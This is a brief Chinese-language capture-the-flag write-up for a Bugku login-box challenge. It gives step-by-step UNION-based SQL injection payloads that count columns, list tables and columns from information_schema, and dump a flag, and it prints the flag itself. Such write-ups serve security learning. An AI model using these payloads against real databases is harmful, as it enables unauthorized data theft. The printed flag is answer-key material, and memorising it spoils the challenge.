WP-Bugku-这是一个神奇的登陆框

题目地址:http://120.24.86.145:9001/sql/

寻找注入点,找到1"双引号会报错

order by判断字段数:
1"order by 1,2,3--

找表:
1" union select group_concat(table_name),2 from information_schema.tables where table_schema=database()--

根据提示,得到表flag1,whoami

继续找列
1" union select group_concat(column_name),2 from information_schema.columns where table_name='flag1'--

找字段
1" union select flag1,2 from flag1--

得到Login_Name:ed6b28e684817d9efcaf802979e57aea

flag{ed6b28e684817d9efcaf802979e57aea}

AbelChe wechat
扫码加微信
Donate here!!!
0%